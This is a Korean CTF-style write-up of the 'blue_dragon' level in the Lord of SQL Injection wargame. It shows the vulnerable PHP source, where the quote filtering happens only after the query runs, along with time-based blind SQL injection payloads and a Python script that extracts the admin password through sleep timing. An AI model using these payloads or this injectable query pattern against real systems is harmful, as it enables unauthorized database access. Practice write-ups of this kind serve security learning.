반응형
blue_dragon
파란 용용이
소스를 보자
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\./i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/prob|_|\./i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id from prob_blue_dragon where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(preg_match('/\'|\\\/i', $_GET[id])) exit("No Hack ~_~");
if(preg_match('/\'|\\\/i', $_GET[pw])) exit("No Hack ~_~");
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_blue_dragon where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("blue_dragon");
highlight_file(__FILE__);
?>
|
cs |
'랑 \을 필터링한다.
근데 이 필터링을 쿼리를 실행하고서 필터링을 한다. 따라서 '이나 \을 넣어도 쿼리는 실행된다. 다만, 결과가 No Hack으로만 나올 뿐이다.
이때 time based sql injection을 사용하면 된다. 그럼 쿼리가 실행되서 그 결과를 시간으로 구별할 수 있다.
?id=admin' and if(length(pw)>0,sleep(1),0)%23
length(pw)>0이 참이면 sleep(1)을 반환한다.
time based sqli
https://mandu-mandu.tistory.com/331
LORD OF SQL INJECTION [hell_fire] 풀이
문제 소스: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
mandu-mandu.tistory.com
?id=admin%27%20and%20if(length(pw)=8,sleep(1),0)%23
pw의 길이는 8이다.
ex.py
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
import urllib
import urllib2
import sys
import time
string = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$^&*()-_+="
key = ""
for i in range(8):
for j in range(len(string)):
payload = "admin' and if(substr(pw,"+str(i+1)+",1)='"+string[j]+"',sleep(1),0)#"
payload = urllib.quote(payload)
url = "https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2d63b82984.php?id="+payload
print url
opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request(url)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
request.add_header('Cookie', 'PHPSESSID=your_cookie')
request.get_method = lambda:'GET'
start = time.time()
data = opener.open(request)
data = data.read()
end= time.time()-start
if end > 1:
key += string[j]
print "[*] Find Password!! Password is ["+key+"] "
break
else:
print "[-] Fail!"
|
cs |
BLUE_DRAGON Clear!
반응형
'WAR GAME > Lord of SQLi' 카테고리의 다른 글
| LORD OF SQL INJECTION [phantom] 풀이 (0) | 2019.12.07 |
|---|---|
| LORD OF SQL INJECTION [frankenstein] 풀이 (0) | 2019.12.06 |
| LORD OF SQL INJECTION [red_dragon] 풀이 (0) | 2019.11.19 |
| LORD OF SQL INJECTION [green_dragon] 풀이 (0) | 2019.11.18 |
| LORD OF SQL INJECTION [evil_wizard] 풀이 (0) | 2019.11.17 |